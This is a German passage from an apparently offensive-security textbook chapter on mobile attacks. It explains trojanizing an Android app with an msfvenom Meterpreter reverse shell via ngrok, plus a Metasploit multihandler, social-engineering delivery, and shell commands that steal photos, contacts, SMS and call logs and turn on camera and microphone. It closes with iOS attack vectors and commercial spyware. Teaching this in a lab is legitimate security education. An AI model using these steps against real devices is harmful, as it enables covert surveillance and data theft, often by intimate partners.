Mit dem Parameter -x geben wir die legitime Original-Anwendung an. Mit --arch nennen wir die Architektur des Payloads. Hier bezieht sich dalvik auf die ältere Android-Runtime. Die Zielplattform für den Payload legt --platform fest, in diesem Fall Android. Die gewünschte Payload folgt nach dem Parameter -p. Für die Reverse-Shell ist die Angabe von LHOST und LPORT notwendig, diese Werte setzen wir dem TCP-Tunnel von ngrok entsprechend. Der Parameter -o definiert die Ausgabe der neuen Anwendung inklusive Payload.
Stellen Sie in jedem Fall sicher, dass die Pakete apktool, default-jdk und zipalign mittels apt install installiert wurden. Diese sind notwendig, um die oben beschriebenen Schritte durchzuführen.
Leider gab und gibt es unter Kali Linux je nach Version, immer wieder Kompatibilitätsprobleme beim Einsatz mit diesen Tools. Dabei liegt die Lösung häufig darin, die Bezugsquelle anzupassen.
Unter Kali 2023.1 haben wir das apktool direkt von der Website bezogen (Anleitung für die Installation unter: https://apktool.org/docs/install/) und für zipalign haben wir die Paketquellen in /etc/apt/sources.list nach deb http://ftp.de.debian.org/debian buster main angepasst.
Je nach Fehlermeldung, die beim Erstellen der Schadsoftware mit msfvenom ausgegeben wird, am besten Google oder ChatGPT um Unterstützung bitten.
Den Multihandler einrichten
Damit die Reverse-Shell entgegengenommen werden kann, müssen wir unter Kali einen Multihandler einrichten. Das erledigen wir am besten unter Metasploit in der msfconsole. Die Vorgehensweise sollte bereits bekannt sein. Die Besonderheit in diesem Fall ist die Festlegung des LHOST und des LPORT, die dem localhost und dem angegebenen Port beim Start von ngrok entspricht, siehe dazu auch Abbildung 29.16.
Es ist angerichtet ... Sobald die App nun auf einem Smartphone installiert und ausgeführt wird, baut sich eine entsprechende Meterpreter-Reverse-Shell mit dem Multihandler auf.
Den Trojaner auf dem Opfer-System installieren
Wie die Anwendung auf das Opfer-System gelangen kann, haben Sie im Laufe dieses Buches an verschiedenen Stellen erfahren. Besonders Social Engineering ist hierbei gefragt. Ob Sie die Anwendung über einen Link zum Download bereitstellen, als E-Mail-Anhang versenden oder gar über einen Nachrichtendienst wie WhatsApp senden, bleibt Ihnen überlassen. Das Opfer sollte allerdings so naiv sein, dass es ein paar offensichtliche Warnhinweise ignoriert.
Für diesen Laborversuch bietet es sich an, auf Kali Linux mit systemctl start apache2 den Webserver zu starten und den Trojaner in das DocumentRoot-Verzeichnis unter /var/www/html abzulegen. Über den Chrome-Browser kann der Trojaner dann auf dem Android-System heruntergeladen werden – vorausgesetzt, Sie nutzen Android-x86 in einer virtuellen Umgebung bzw. ein Opfer-Smartphone mit WLAN-Anbindung im lokalen Heimnetz.
Zunächst muss die Installation einer Anwendung von einer unbekannten Quelle in den Sicherheitseinstellungen zugelassen werden.
Wurde diese Einstellung durch den Anwender festgelegt, werden die Berechtigungen für die zu installierende App angezeigt. Diese müssen vor der Installation entsprechend bestätigt werden. Bei einem aufmerksamen und sicherheitsbewussten Anwender würden jetzt alle Alarmglocken läuten. Hier stellt man sich berechtigterweise die Frage, wozu eine Anwendung, die Notizen verwalten soll, zwei Bildschirmseiten voller Berechtigungen benötigt. Ein fahrlässiger Anwender würde diesen Hinweis evtl. einfach bestätigen, ohne sich weitere Gedanken darüber zu machen.
Ein letzter Sicherheitshinweis kann noch von Google Play Protect (siehe Abbildung 29.17) oder einem ggf. installierten Virenscanner kommen. Wird auch diese Warnung ignoriert, ist der Trojaner auf dem System eingerichtet.
Der Anwender sieht eine scheinbar harmlose Anwendung, die es ihm auch tatsächlich erlaubt, Notizen zu erstellen. Im Hintergrund wird unbemerkt eine Meterpreter-Shell zum Angreifer aufgebaut.
In der Praxis ist es übrigens häufig so, dass derartige Malware von Personen im engen Umfeld des Opfers installiert wird, die Zugang zu dessen Mobilgerät haben (z.B. Lebenspartner oder »Freunde«). Da einmal gewährte Berechtigungen später nicht mehr abgefragt werden, hat das Opfer kaum Chancen, die Manipulation zu erkennen.
Die Android-Meterpreter-Shell nutzen
Damit ist es um das Opfer geschehen: Der Angreifer hat nun durch die zahlreichen Funktionen der Android-Meterpreter-Payload vielseitige Möglichkeiten, die Sie sich durch die Eingabe von ? in der Shell anzeigen lassen können.
Mit dem Befehl download /storage/emulated/0/DCIM laden Sie beispielsweise gespeicherte Bilder vom infizierten Gerät herunter, dump_callog, dump_contacts oder dump_sms veranlasst analog einen Download der entsprechenden Informationen, also Anruf-Historie, Kontakte bzw. SMS-Nachrichten. Durch das Kommando send_sms -d <Empfänger> -t <Text> können sogar SMS im Namen des Opfers versendet werden. Es können Screenshots erstellt (screenshot), die GPS-Daten abgefragt (geolocate) oder sogar die Kamera und das Mikrofon aktiviert werden (webcam_snap und record_mic). Das sind nur ein paar der Funktionen, die dem Angreifer an dieser Stelle zur Verfügung stehen.
Gelingt es dem Angreifer, eine derartige Verbindung zum Opfer aufzubauen, sind nahezu alle Grenzen gefallen und alles möglich. Allerdings sei an dieser Stelle auch erwähnt, dass das Opfer hier grobe Sicherheitsaspekte missachtet hat, wie wir zuvor dargestellt haben.
29.3.7 Angriffe auf iOS
Im Gegensatz zu Android ist bei iOS die Installation von Drittanbieter-Apps aus ungeprüften Quellen grundsätzlich nicht möglich.
Das schützt zwar iOS-Anwender vor dieser Art Angriff, das heißt aber nicht, dass es auf Apple-Komponenten keine Sicherheitslücken gibt. Im Gegenteil gilt: Keine Plattform ist 100%ig sicher, denn für jedes Betriebssystem existieren entsprechende Angriffsmöglichkeiten.
Wie bereits in Abschnitt 29.3.3 erläutert, ist für bestimmte iOS-Versionen z.B. ein Jailbreak möglich, der eine Privilegien-Eskalation zulässt und die Voraussetzung für diverse weitere von Apple nicht vorgesehene Handlungen ist. Wie dort ausgeführt, betrifft dies auch aktuellere Versionen.
Es ist zwar nicht so einfach, unter iOS Anwendungen außerhalb des App Stores zu installieren, aber es funktioniert unter Umständen dennoch. Hat das Gerät einen Jailbreak bekommen oder wurde über das Apple Developer Enterprise Program eine sogenannte Unternehmens-App installiert, ist es auch unter iOS möglich, eigene Anwendungen zu installieren. Details und Hilfe dazu finden Sie unter https://support.apple.com/de-de/HT204460.
Es gibt verschiedene Angriffsvektoren auf iOS. Eine interessante Schwachstelle wurde von Samuel Groß entdeckt. Er präsentierte auf dem 36. Chaos Communication Congress (36C3) einen Angriff, bei dem es möglich ist, mit einer Nachricht an die iOS-eigene Chat-App iMessage die Kontrolle über ein iPhone zu erlangen. Die Aufzeichnung der Präsentation können Sie unter https://media.ccc.de/v/36c3-10497-messenger_hacking_remotely_compromising_an_iphone_through_imessage ansehen. Die Schwachstelle wurde an Apple gemeldet und vor der Veröffentlichung behoben. Allerdings unterstreicht der Exploit wieder die Aussage, dass mit genügend Einsatz und Mitteln überall Schwachstellen zu finden sind. Gegen Organisationen mit entsprechender finanzieller Ausstattung, wie NSA & Co., ist daher kaum ein Kraut gewachsen.
29.3.8 Spyware für mobile Geräte
Bereits in Kapitel 12 sind wir im Zusammenhang von Malware auch auf Spyware eingegangen. Dabei haben wir Ihnen gezeigt, welche Möglichkeiten ein Angreifer hat, wenn dieser einmal eine entsprechende Spyware auf einem Endgerät platziert hat. Die Folgen wiegen im Zusammenhang mit einem mobilen Endgerät meistens sogar noch schwerer. Wir haben die Möglichkeiten der Meterpreter-Shell bereits dargelegt – es ist erschreckend bzw. faszinierend (je nach Blickwinkel), was damit alles möglich ist.
Mit professioneller Mobile-Spyware werden alle Aktivitäten auf dem Telefon aufgezeichnet und protokolliert. Davon betroffen sind z.B. die Internetnutzung, Textnachrichten, Telefonanrufe, GPS-Koordinaten und Medieninhalte. Anschließend kann der Angreifer über eine Website der Software auf die protokollierten Informationen zugreifen oder sich diese bequem per E-Mail zusenden lassen. Für einen vollen Funktionsumfang muss das Gerät des Opfers gerootet sein bzw. ein Jailbreak durchgeführt werden.
Jede Installation einer Spionage-App, die ohne die Zustimmung der überwachten Person durchgeführt wird, ist nach dem Strafgesetzbuch eine Straftat. Handlungen wie das Abhören von Gesprächen, unerlaubtes Fotografieren und das Ausspähen von Daten sind verboten.
Anbieter wie mSpy (www.mspy.com.de) oder FlexiSpy (www.flexispy.com) bieten plattformunabhängig unter anderen diese Dienste an. Es existiert allerdings noch eine Vielzahl weiterer Überwachungstools. Geworben wird mit Begriffen wie »Kindersicherung«, da die Überwachung der eigenen Kinder im Rahmen der Aufsichtspflicht durch Recht und Gesetz abgedeckt ist.
![[Bild]](../Images/Kap29_App-Berechtigungen.jpg)
![[Bild]](../Images/Kap29_BlueStacks.jpg)
![[Bild]](../Images/Kap29_Android-x86.jpg)
![[Bild]](../Images/Kap29_Android-x86_2.jpg)
![[Bild]](../Images/Kap29_root_1.jpg)
![[Bild]](../Images/Kap29_adb.jpg)
![[Bild]](../Images/Kap29_Android-Bootprozess.jpg)
![[Bild]](../Images/Kap29_TWRP.jpg)
![[Bild]](../Images/Kap29_Root-Checker.jpg)
![[Bild]](../Images/Kap29_nmap.jpg)
![[Bild]](../Images/Kap29_metasploit.jpg)
![[Bild]](../Images/Kap29_zAnti.jpg)
![[Bild]](../Images/Kap29_Android-Trojaner.jpg)
![[Bild]](../Images/Kap29_ngrok.jpg)
![[Bild]](../Images/Kap29_ngrok-2.jpg)
![[Bild]](../Images/Kap29_multihandler.jpg)
![[Bild]](../Images/Kap29_PlayProtect.jpg)
![[Bild]](../Images/Kap29_MDM.jpg)